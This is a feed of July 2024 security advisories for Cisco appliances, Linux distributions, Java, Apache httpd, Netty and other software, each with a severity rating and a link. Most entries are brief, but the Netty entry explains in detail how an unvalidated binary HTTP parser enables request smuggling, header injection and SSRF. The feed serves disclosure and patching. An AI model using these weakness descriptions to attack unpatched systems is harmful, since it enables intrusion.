17.07.2024 19:00:00	cisco	[CISCO-SA-SWA-PRIV-ESC-7UHPZSCC] Cisco Secure Web Appliance Privilege Escalation Vulnerability (high)	A vulnerability in the CLI of Cisco AsyncOS for Secure Web Appliance could allow an authenticated, local attacker to execute arbitrary commands and elevate privileges to root.This vulnerability is due to insufficient validation of user-supplied input for the CLI. An attacker could exploit this vulnerability by authenticating to the system and executing a crafted command on the affected device. A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system and elevate privileges to root. To successfully exploit this vulnerability, an attacker would need at least guest credentials.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-SWA-PRIV-ESC-7UHPZSCC
17.07.2024 19:00:00	cisco	[CISCO-SA-SB-RV34X-RCE-7PQFU2E] Cisco RV340 and RV345 Dual WAN Gigabit VPN Routers Authenticated Remote Code Execution Vulnerability (medium)	A vulnerability in the upload module of Cisco RV340 and RV345 Dual WAN Gigabit VPN Routers could allow an authenticated, remote attacker to execute arbitrary code on an affected device.This vulnerability is due to insufficient boundary checks when processing specific HTTP requests. An attacker could exploit this vulnerability by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system of the device.There are no workarounds that address this vulnerability.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-SB-RV34X-RCE-7PQFU2E
17.07.2024 19:00:00	cisco	[CISCO-SA-ISE-FILE-UPLOAD-KRW2TXA9] Cisco Identity Services Engine Arbitrary File Upload Vulnerability (high)	A vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) could allow an authenticated, remote attacker to upload arbitrary files to an affected device. To exploit this vulnerability, an attacker would need at least valid Policy Admin credentials on the affected device.This vulnerability is due to improper validation of files that are uploaded to the web-based management interface. An attacker could exploit this vulnerability by uploading arbitrary files to an affected device. A successful exploit could allow the attacker to store malicious files on the system, execute arbitrary commands on the operating system, and elevate privileges to root.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-ISE-FILE-UPLOAD-KRW2TXA9
17.07.2024 19:00:00	cisco	[CISCO-SA-INODE-STATIC-KEY-VUVCEYNN] Cisco Intelligent Node Software Static Key Vulnerability (high)	A vulnerability in Cisco Intelligent Node (iNode) Software could allow an unauthenticated, remote attacker to hijack the TLS connection between Cisco iNode Manager and associated intelligent nodes and send arbitrary traffic to an affected device.This vulnerability is due to the presence of hard-coded cryptographic material. An attacker in a man-in-the-middle position between Cisco iNode Manager and associated deployed nodes could exploit this vulnerability by using the static cryptographic key to generate a trusted certificate and impersonate an affected device. A successful exploit could allow the attacker to read data that is meant for a legitimate device, modify the startup configuration of an associated node, and, consequently, cause a denial of service (DoS) condition for downstream devices that are connected to the affected node.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-INODE-STATIC-KEY-VUVCEYNN
17.07.2024 19:00:00	cisco	[CISCO-SA-EXPRESSWAY-REDIRECT-KJSFUXGJ] Cisco Expressway Series Open Redirect Vulnerability (medium)	A vulnerability in the web-based management interface of Cisco Expressway Series could allow an unauthenticated, remote attacker to redirect a user to a malicious web page.This vulnerability is due to improper input validation of HTTP request parameters. An attacker could exploit this vulnerability by intercepting and modifying an HTTP request from a user. A successful exploit could allow the attacker to redirect the user to a malicious web page.Note: Cisco Expressway Series refers to Cisco Expressway Control (Expressway-C) devices and Cisco Expressway Edge (Expressway-E) devices.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-EXPRESSWAY-REDIRECT-KJSFUXGJ
17.07.2024 19:00:00	cisco	[CISCO-SA-ESA-PRIV-ESC-SSTI-XNO2EOGZ] Cisco Secure Email Gateway Server-Side Template Injection Vulnerability (medium)	A vulnerability in the web-based management interface of Cisco AsyncOS for Secure Email Gateway could allow an authenticated, remote attacker to execute arbitrary system commands on an affected device.This vulnerability is due to insufficient input validation in certain portions of the web-based management interface. An attacker could exploit this vulnerability by sending a crafted HTTP request to the affected device. A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system with root privileges. To successfully exploit this vulnerability, an attacker would need at least valid Operator credentials.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-ESA-PRIV-ESC-SSTI-XNO2EOGZ
17.07.2024 19:00:00	cisco	[CISCO-SA-ESA-AFW-BGG2USJH] Cisco Secure Email Gateway Arbitrary File Write Vulnerability (critical)	A vulnerability in the content scanning and message filtering features of Cisco Secure Email Gateway could allow an unauthenticated, remote attacker to overwrite arbitrary files on the underlying operating system.This vulnerability is due to improper handling of email attachments when file analysis and content filters are enabled. An attacker could exploit this vulnerability by sending an email that contains a crafted attachment through an affected device. A successful exploit could allow the attacker to replace any file on the underlying file system. The attacker could then perform any of the following actions: add users with root privileges, modify the device configuration, execute arbitrary code, or cause a permanent denial of service (DoS) condition on the affected device.Note: Manual intervention is required to recover from the DoS condition. Customers are advised to contact the Cisco Technical Assistance Center (TAC) to help recover a device in this condition.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-ESA-AFW-BGG2USJH
17.07.2024 19:00:00	cisco	[CISCO-SA-CSSM-AUTH-SLW3UHUY] Cisco Smart Software Manager On-Prem Password Change Vulnerability (critical)	A vulnerability in the authentication system of Cisco Smart Software Manager On-Prem (SSM On-Prem) could allow an unauthenticated, remote attacker to change the password of any user, including administrative users.This vulnerability is due to improper implementation of the password-change process. An attacker could exploit this vulnerability by sending crafted HTTP requests to an affected device. A successful exploit could allow an attacker to access the web UI or API with the privileges of the compromised user.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-CSSM-AUTH-SLW3UHUY
17.07.2024 18:48:31	ubuntu	[USN-6900-1] Linux kernel vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6900-1
17.07.2024 22:30:07	npm	[NPM:GHSA-GHGQ-X6WC-6JR5] Zowe CLI allows storage of previously entered secure credentials in a plaintext file (moderate)	A vulnerability in Zowe CLI allows local, privileged actors to store previously entered secure credentials in a plaintext file as part of an auto-init operation.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-GHGQ-X6WC-6JR5
17.07.2024 22:29:07	maven	[MAVEN:GHSA-2RWM-XV5J-777P] Eclipse Parsson stack overflow when parsing deeply nested input (high)	In Eclipse Parsson before 1.0.4 and 1.1.3, a document with a large depth of nested objects can allow an attacker to cause a Java stack overflow exception and denial of service. Eclipse Parsson allows processing (e.g. parse, generate, transform and query) JSON documents.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-2RWM-XV5J-777P
17.07.2024 18:09:25	ubuntu	[USN-6898-2] Linux kernel vulnerabilities (critical)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6898-2
17.07.2024 03:00:00	cisa	[CISA-2024:0717] CISA Adds 3 Known Exploited Vulnerabilities to Catalog (critical)	CISA has added 3 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.	https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0717
17.07.2024 03:00:00	redhat	[RHSA-2024:4568] java-17-openjdk security update (important)	The java-17-openjdk packages provide the OpenJDK 17 Java Runtime Environment and the OpenJDK 17 Java Software Development Kit.Security Fix(es):* OpenJDK: RangeCheckElimination array index overflow (8323231) (CVE-2024-21147)* OpenJDK: potential UTF8 size overflow (8314794) (CVE-2024-21131)* OpenJDK: Excessive symbol length can lead to infinite loop (8319859) (CVE-2024-21138)* OpenJDK: Range Check Elimination (RCE) pre-loop limit overflow (8320548) (CVE-2024-21140)* OpenJDK: Out-of-bounds access in 2D image handling (8324559) (CVE-2024-21145)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4568
17.07.2024 03:00:00	redhat	[RHSA-2024:4573] java-21-openjdk security update (important)	The java-21-openjdk packages provide the OpenJDK 21 Java Runtime Environment and the OpenJDK 21 Java Software Development Kit.Security Fix(es):* OpenJDK: RangeCheckElimination array index overflow (8323231) (CVE-2024-21147)* OpenJDK: potential UTF8 size overflow (8314794) (CVE-2024-21131)* OpenJDK: Excessive symbol length can lead to infinite loop (8319859) (CVE-2024-21138)* OpenJDK: Range Check Elimination (RCE) pre-loop limit overflow (8320548) (CVE-2024-21140)* OpenJDK: Out-of-bounds access in 2D image handling (8324559) (CVE-2024-21145)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4573
17.07.2024 22:30:44	rubysec	[RUBYSEC:REXML-2024-39908] DoS in REXML (medium)	There is a DoS vulnerability in REXML gem. This vulnerability hasbeen assigned the CVE identifier CVE-2024-39908. We stronglyrecommend upgrading the REXML gem.## DetailsWhen it parses an XML that has many specific characters such as<, 0 and %>. REXML gem may take long time.Please update REXML gem to version 3.3.2 or later.## Affected versionsREXML gem 3.3.2 or prior## CreditsThanks to mprogrammer for discovering this issue.## HistoryOriginally published at 2024-07-16 03:00:00 (UTC)	https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:REXML-2024-39908
19.07.2024 01:14:29	maven	[MAVEN:GHSA-Q8F2-HXQ5-CP4H] Absent Input Validation in BinaryHttpParser (high)	### Summary`BinaryHttpParser` does not properly validate input values thus giving attackers almost complete control over the HTTP requests constructed from the parsed output. Attackers can abuse several issues individually to perform various injection attacks including HTTP request smuggling, desync attacks, HTTP header injections, request queue poisoning, caching attacks and Server Side Request Forgery (SSRF). Attacker could also combine several issues to create well-formed messages for other text-based protocols which may result in attacks beyond the HTTP protocol.### DetailsPath, Authority, SchemeThe BinaryHttpParser class implements the readRequestHead method which performs most of the relevant parsing of the received request. The data structure prefixes values with a variable length integer value. The algorithm to create a variable length integer value is below:```def encode_int(n): if n < 64: base = 0x00 l = 1 elif n in range(64, 16384): base = 0x4000 l = 2 elif n in range(16384, 1073741824): base = 0x80000000 l = 4 else: base = 0xc000000000000000 l = 8 encoded = base \| n return encoded.to_bytes()```The parsing code below first gets the lengths of the values from the prefixed variable length integer. After it has all of the lengths and calculates all of the indices, the parser casts the applicable slices of the ByteBuf to String. Finally, it passes these values into a new `DefaultBinaryHttpRequest` object where no further parsing or validation occurs.```//netty-incubator-codec-ohttp/codec-bhttp/src/main/java/io/netty/incubator/codec/bhttp/BinaryHttpParser.javapublic final class BinaryHttpParser { ... private static BinaryHttpRequest readRequestHead(ByteBuf in, boolean knownLength, int maxFieldSectionSize) { ... final long pathLength = getVariableLengthInteger(in, pathLengthIdx, pathLengthBytes); ... final int pathIdx = pathLengthIdx + pathLengthBytes; .../417/ String method = in.toString(methodIdx, (int) methodLength, StandardCharsets.US_ASCII);/418/ String scheme = in.toString(schemeIdx, (int) schemeLength, StandardCharsets.US_ASCII);/419/ String authority = in.toString(authorityIdx, (int) authorityLength, StandardCharsets.US_ASCII);/420/ String path = in.toString(pathIdx, (int) pathLength, StandardCharsets.US_ASCII);/422/ BinaryHttpRequest request = new DefaultBinaryHttpRequest(HttpVersion.HTTP_1_1, HttpMethod.valueOf(method), scheme, authority, path, headers); in.skipBytes(sumBytes); return request; } ...}```Request MethodOn line 422 above, the parsed method value is passed into `HttpMethod.valueOf` method. The return value from this is passed to the `DefaultBinaryHttpRequest` constructor.Below is the code for HttpMethod.valueOf:``` public static HttpMethod valueOf(String name) { // fast-path if (name == HttpMethod.GET.name()) { return HttpMethod.GET; } if (name == HttpMethod.POST.name()) { return HttpMethod.POST; } // "slow"-path HttpMethod result = methodMap.get(name); return result != null ? result : new HttpMethod(name); }```If the result of `methodMap.get` is not `null`, then a new arbitrary `HttpMethod` instance will be returned using the provided name value.`methodMap` is an instance of type `EnumNameMap` which is also defined within the `HttpMethod` class:``` EnumNameMap(Node<T>... nodes) { this.values = (Node[])(new Node[MathUtil.findNextPositivePowerOfTwo(nodes.length)]); this.valuesMask = this.values.length - 1; Node[] var2 = nodes; int var3 = nodes.length; for(int var4 = 0; var4 < var3; ++var4) { Node<T> node = var2[var4]; int i = hashCode(node.key) & this.valuesMask; if (this.values[i] != null) { throw new IllegalArgumentException("index " + i + " collision between values: [" + this.values[i].key + ", " + node.key + ']'); } this.values[i] = node; } } T get(String name) { Node<T> node = this.values[hashCode(name) & this.valuesMask]; return node != null && node.key.equals(name) ? node.value : null; }```Note that `EnumNameMap.get()` returns a boolean value, which is not `null`. Therefore, any arbitrary http verb used within a `BinaryHttpRequest` will yield a valid `HttpMethod` object. When the `HttpMethod` object is constructed, the name is checked for whitespace and similar characters. Therefore, we cannot perform complete injection attacks using the HTTP verb alone. However, when combined with the other input validation issues, such as that in the path field, we can construct somewhat arbitrary data blobs that satisfy text-based protocol message formats.### ImpactMethod is partially validated while other values are not validated at all. Software that relies on netty to apply input validation for binary HTTP data may be vulnerable to various injection and protocol based attacks.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-Q8F2-HXQ5-CP4H
18.07.2024 23:23:31	slackware	[SSA:2024-200-01] httpd	New httpd packages are available for Slackware 15.0 and -current tofix security issues.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/httpd-2.4.62-i586-1_slack15.0.txz: Upgraded. This release contains security fixes and improvements. The first CVE is for Windows, but the second one is an additional fix for the source code disclosure regression when using AddType. Users are recommended to upgrade to version 2.4.62 which fixes this issue. For more information, see: https://downloads.apache.org/httpd/CHANGES_2.4.62 https://www.cve.org/CVERecord?id=CVE-2024-40898 https://www.cve.org/CVERecord?id=CVE-2024-40725 (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/httpd-2.4.62-i586-1_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/httpd-2.4.62-x86_64-1_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/httpd-2.4.62-i586-1.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/httpd-2.4.62-x86_64-1.txzMD5 signaturesSlackware 15.0 package:26f16142dba75d509e78213ca5b78258 httpd-2.4.62-i586-1_slack15.0.txzSlackware x86_64 15.0 package:ebaaed99b90d8085efd2ade4e61dec98 httpd-2.4.62-x86_64-1_slack15.0.txzSlackware -current package:c07f7b99705234a02bc0abbfe24c77e6 n/httpd-2.4.62-i586-1.txzSlackware x86_64 -current package:963391e1167fa2b20f31f222f23d90ae n/httpd-2.4.62-x86_64-1.txzInstallation instructions*Upgrade the package as root:`# upgradepkg httpd-2.4.62-i586-1_slack15.0.txz`Then, restart Apache httpd:`# /etc/rc.d/rc.httpd stop``# /etc/rc.d/rc.httpd start`	https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-200-01
18.07.2024 18:22:03	maven	[MAVEN:GHSA-XMVG-335G-X44Q] The OpenSearch reporting plugin improperly controls tenancy access to reporting resources (moderate)	### SummaryAn issue in the OpenSearch reporting plugin allows unintended access to private tenant resources like notebooks. The system did not properly check if the user was the resource author when accessing resources in a private tenant, leading to potential data being revealed.### ImpactThe lack of proper access control validation for private tenant resources in the OpenSearch observability and reporting plugins can lead to unintended data access. If an authorized user with observability or reporting roles is aware of another user's private tenant resource ID, such as a notebook, they can potentially read, modify, or take ownership of that resource, despite not being the original author, thus impacting the confidentiality and integrity of private tenant resources. The impact is confined to private tenant resources, where authorized users may gain inappropriate visibility into data intended to be private from other users within the same OpenSearch instance, potentially violating the intended separation of access. This issue does not alter the scope of access but highlights a flaw in the existing access control mechanisms.Impacted versions <= 2.13### PatchesThe patches are included in OpenSearch 2.14### WorkaroundsNone### ReferencesOpenSearch 2.14 is available for download at https://opensearch.org/versions/opensearch-2-14-0.htmlThe latest version of OpenSearch is available for download at https://opensearch.org/downloads.html	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-XMVG-335G-X44Q
18.07.2024 14:49:16	ubuntu	[USN-6902-1] Apache HTTP Server vulnerability	Apache HTTP Server could be made to expose sensitive information over thenetwork.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6902-1
18.07.2024 13:15:03	alpinelinux	[ALPINE:CVE-2024-40898] apache2 vulnerability	[From CVE-2024-40898] SSRF in Apache HTTP Server on Windows with mod_rewrite in server/vhost context, allows to potentially leak NTML hashes to a malicious server via SSRF and malicious requests.Users are recommended to upgrade to version 2.4.62 which fixes this issue.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-40898
18.07.2024 13:15:02	alpinelinux	[ALPINE:CVE-2024-40725] apache2 vulnerability	[From CVE-2024-40725] A partial fix for CVE-2024-39884 in the core of Apache HTTP Server 2.4.61 ignores some use of the legacy content-type based configuration of handlers. "AddType" and similar configuration, under some circumstances where files are requested indirectly, result in source code disclosure of local content. For example, PHP scripts may be served instead of interpreted.Users are recommended to upgrade to version 2.4.62, which fixes this issue.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-40725
18.07.2024 08:18:18	ubuntu	[USN-6901-1] stunnel vulnerability (high)	stunnel could allow unintended access to network services.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6901-1
18.07.2024 03:00:00	debian	[DSA-5733-1] thunderbird (critical)	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5733-1
18.07.2024 03:00:00	debian	[DSA-5732-1] chromium	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5732-1
18.07.2024 03:00:00	oraclelinux	[ELSA-2024-4617] qt5-qtbase security update (important)	[5.15.3-8]- HTTP2: Delay any communication until encrypted() can be responded to Resolves: RHEL-46340	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-4617
18.07.2024 03:00:00	oraclelinux	[ELSA-2024-4623] qt5-qtbase security update (important)	[5.15.9-10]- HTTP2: Delay any communication until encrypted() can be responded to Resolves: RHEL-46348	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-4623
18.07.2024 03:00:00	oraclelinux	[ELSA-2024-4636] libndp security update (important)	[1.8-6]- Validate route information option length[1.8-5]- Convert the license tag to SPDX format Related: RHELMISC-1363	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-4636
18.07.2024 03:00:00	redhat	[RHSA-2024:4617] qt5-qtbase security update (important)	Qt is a software toolkit for developing applications. The qt5-base packages contain base tools for string, xml, and network handling in Qt. Security Fix(es):* qtbase: qtbase: Delay any communication until encrypted() can be responded to (CVE-2024-39936)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4617
18.07.2024 03:00:00	redhat	[RHSA-2024:4620] libndp security update (important)	Libndp is a library (used by NetworkManager) that provides a wrapper for the IPv6 Neighbor Discovery Protocol. It also provides a tool named ndptool for sending and receiving NDP messages.Security Fix(es):* libndp: buffer overflow in route information length field (CVE-2024-5564)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4620
18.07.2024 03:00:00	redhat	[RHSA-2024:4635] thunderbird security update (important)	Mozilla Thunderbird is a standalone mail and newsgroup client.Security Fix(es):* Mozilla: Memory safety bugs fixed in Firefox 128, Firefox ESR 115.13, and Thunderbird 115.13 (CVE-2024-6604)* Mozilla: Race condition in permission assignment (CVE-2024-6601)* Mozilla: Memory corruption in thread creation (CVE-2024-6603)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4635
18.07.2024 03:00:00	redhat	[RHSA-2024:4623] qt5-qtbase security update (important)	Qt is a software toolkit for developing applications. The qt5-base packages contain base tools for string, xml, and network handling in Qt. Security Fix(es):* qtbase: qtbase: Delay any communication until encrypted() can be responded to (CVE-2024-39936)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4623
18.07.2024 03:00:00	redhat	[RHSA-2024:4624] thunderbird security update (important)	Mozilla Thunderbird is a standalone mail and newsgroup client.Security Fix(es):* Mozilla: Race condition in permission assignment (CVE-2024-6601)* Mozilla: Memory corruption in thread creation (CVE-2024-6603)* Mozilla: Memory safety bugs fixed in Firefox 128, Firefox ESR 115.13, and Thunderbird 115.13 (CVE-2024-6604)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4624
18.07.2024 03:00:00	redhat	[RHSA-2024:4636] libndp security update (important)	Libndp is a library (used by NetworkManager) that provides a wrapper for the IPv6 Neighbor Discovery Protocol. It also provides a tool named ndptool for sending and receiving NDP messages.Security Fix(es):* libndp: buffer overflow in route information length field (CVE-2024-5564)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4636
18.07.2024 03:00:00	oraclelinux	[ELSA-2024-4567] java-11-openjdk security update (important)	[11.0.24.0.8-2.0.1]- Add Oracle vendor bug URL [Orabug: 34340155][1:11.0.24.0.8-1]- Update to jdk-11.0.24+8 (GA)- Update release notes to 11.0.24+8- Adjusted DTLS & RPATH NEWS entries to match OpenJDK 17 & 21 release notes- Switch to GA mode for release- Fix Provides to reflect up to date component versions- Add zlib build required or bundled version (1.3.1), depending on system_libs setting- Resolves: RHEL-45202- This tarball is embargoed until 2024-07-16 @ 1pm PT. [1:11.0.23.0.9-2]- Fix 11.0.22 release date in NEWS[1:11.0.23.0.9-1]- Update to jdk-11.0.23+9 (GA)- Update release notes to 11.0.23+9- Switch to GA mode for release- Require tzdata 2024a due to upstream inclusion of JDK-8322725- Only require tzdata 2023d for now as 2024a is unavailable in buildroot- This tarball is embargoed until 2024-04-16 @ 1pm PT. - Resolves: RHEL-30920[1:11.0.23.0.1-0.1.ea]- Update to jdk-11.0.23+1 (EA)- Update release notes to 11.0.23+1- Switch to EA mode[1:11.0.22.0.7-1]- Update to jdk-11.0.22+7 (GA)- Sync the copy of the portable specfile with the latest update- Drop local copy of JDK-8312489 which is now included upstream- This tarball is embargoed until 2024-01-16 @ 1pm PT. - Resolves: RHEL-20991[1:11.0.21.0.9-2]- Update to jdk-11.0.21+9 (GA)- Sync the copy of the portable specfile with the latest update- Re-generate FIPS patch against 11.0.21+1 following backport of JDK-8155246- Re-generate SHA3 patch following backport of JDK-8242151- Bump libpng version to 1.6.39 following JDK-8305815- Bump HarfBuzz version to 7.2.0 following JDK-8307301- Bump freetype version to 2.13.0 following JDK-8306881- Update generate_tarball.sh to be closer to upstream vanilla script inc. no more ECC removal- Update bug URL for RHEL to point to the Red Hat customer portal- Change top_level_dir_name to use the VCS tag, matching new upstream release style tarball- Apply all patches using -p1- Drop local backport of JDK-8243210 which is upstream from 11.0.21+2- Add missing JFR alternative ghost- Move jcmd to the headless package- This tarball is embargoed until 2023-10-17 @ 1pm PT. - Resolves: RHEL-12214- Resolves: RHEL-13526- Resolves: RHEL-13529- Resolves: RHEL-13532- Resolves: RHEL-13536- Resolves: RHEL-13539[1:11.0.20.1.1-2]- Bump release number so we are newer than 9.0- Related: rhbz#2236590[1:11.0.20.1.1-1]- Update to jdk-11.0.20.1+1 (GA)- Add backport of JDK-8312489 already upstream in 11.0.22 (see OPENJDK-2095)- Add backport of JDK-8243210 already upstream in 11.0.21 (see RH2229269)- Update openjdk_news script to specify subdirectory last- Add missing discover_trees script required by openjdk_news- Resolves: rhbz#2236590[1:11.0.20.0.8-3]- Fix tzdata requirement copy-and-paste error that led to two BuildRequires and no Requires- Resolves: rhbz#2224420[1:11.0.20.0.8-2]- Bump release number so we are newer than 9.0- Related: rhbz#2221106[1:11.0.20.0.8-1]- Update to jdk-11.0.20.0+8 (GA)- Update release notes to 11.0.20.0+8- Drop local inclusion of JDK-8274864 & JDK-8305113 as they are included in 11.0.20+1- Bump tzdata requirement to 2023c now it is available in the buildroot- Bump bundled LCMS version to 2.15 as in jdk-11.0.20+1.- Bump bundled HarfBuzz version to 7.0.1 as in jdk-11.0.20+7- Use tapsets from the misc tarball- Introduce 'prelease' for the portable release versioning, to handle EA builds- Make sure root installation directory is created first- Use in-place substitution for all but the first of the tapset changes- Sync the copy of the portable specfile with the latest update- Add note at top of spec file about rebuilding- This tarball is embargoed until 2023-07-18 @ 1pm PT. - Resolves: rhbz#2217715- Resolves: rhbz#2221106[1:11.0.19.0.7-4]- Include the java-11-openjdk-portable.spec file with instructions on how to rebuild.- Related: rhbz#2150201[1:11.0.19.0.7-3]- Revert 'Restore native build for x86 as there is no portable build'- Reintroduce useful cleanups from x86 reversion- Adjust oj_vendor_version & oj_vendor_bug_url to match the portable so test passes- Related: rhbz#2150201[1:11.0.19.0.7-2]- Update to jdk-11.0.19.0+7- Update release notes to 11.0.19.0+7- Require tzdata 2023c due to local inclusion of JDK-8274864 & JDK-8305113- Update generate_tarball.sh to add support for passing a boot JDK to the configure run- Add POSIX-friendly error codes to generate_tarball.sh and fix whitespace- Remove .jcheck and GitHub support when generating tarballs, as done in upstream release tarballs- Rebase FIPS support against 11.0.19+6- Rebase RH1750419 alt-java patch against 11.0.19+6- Replace local copies of JDK portable binaries with build dependencies- Use portable build on x86_32 now one is available- This tarball is embargoed until 2023-04-18 @ 1pm PT. - Resolves: rhbz#2185182- Resolves: rhbz#2150201[1:11.0.18.0.10-4]- On portable architectures, replace build section with extraction of existing builds from portables- Rewrite ELF files so the source file path is correct and debugsources can be assembled- Backport SHA-3 support for PKCS11 provider- Sync patch set with portable build we are using by removing rh1648644-java_access_bridge_privileged_security.patch- Resolves: rhbz#2150201[1:11.0.18.0.10-3]- Update to jdk-11.0.18+10 (GA)- Update release notes to 11.0.18+10- Switch to GA mode for release- Resolves: rhbz#2160111[1:11.0.18.0.9-0.3.ea]- Update to jdk-11.0.18+9- Update release notes to 11.0.18+9- Drop local copy of JDK-8293834 now this is upstream- Require tzdata 2022g due to inclusion of JDK-8296108, JDK-8296715 & JDK-8297804- Update TestTranslations.java to test the new America/Ciudad_Juarez zone- Resolves: rhbz#2150197[1:11.0.18.0.1-0.3.ea]- Update to jdk-11.0.18+1- Update release notes to 11.0.18+1- Switch to EA mode for 11.0.18 pre-release builds.- Drop local copies of JDK-8294357 & JDK-8295173 now upstream contains tzdata 2022e- Drop local copy of JDK-8275535 which is finally upstream- Related: rhbz#2150197[1:11.0.17.0.8-2]- Update to jdk-11.0.17+8 (GA)- Update release notes to 11.0.17+8- Switch to GA mode for release- Update in-tree tzdata to 2022e with JDK-8294357 & JDK-8295173- Update CLDR data with Europe/Kyiv (JDK-8293834)- Drop JDK-8292223 patch which we found to be unnecessary- Update TestTranslations.java to use public API based on TimeZoneNamesTest upstream- The stdc++lib, zlib & freetype options should always be set from the global, so they are not altered for staticlibs builds- Remove freetype sources along with zlib sources- Resolves: rhbz#2133695[1:11.0.17.0.7-0.1.ea]- Update to jdk-11.0.17+7- Update release notes to 11.0.17+7- Resolves: rhbz#2130619[1:11.0.17.0.1-0.2.ea]- Update to jdk-11.0.17+1- Update release notes to 11.0.17+1- Switch to EA mode for 11.0.17 pre-release builds.- Bump HarfBuzz bundled version to 4.4.1 following JDK-8289853- Bump FreeType bundled version to 2.12.1 following JDK-8290334- Related: rhbz#2130619[1:11.0.16.1.1-3]- Switch to static builds, reducing system dependencies and making build more portable- Resolves: rhbz#2121275[1:11.0.16.1.1-2]- Update to jdk-11.0.16.1+1- Update release notes to 11.0.16.1+1- Add patch to provide translations for Europe/Kyiv added in tzdata2022b- Add test to ensure timezones can be translated- Resolves: rhbz#2119528[1:11.0.16.0.8-2]- Update to jdk-11.0.16+8- Update release notes to 11.0.16+8- Switch to GA mode for release- Resolves: rhbz#2106517	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-4567
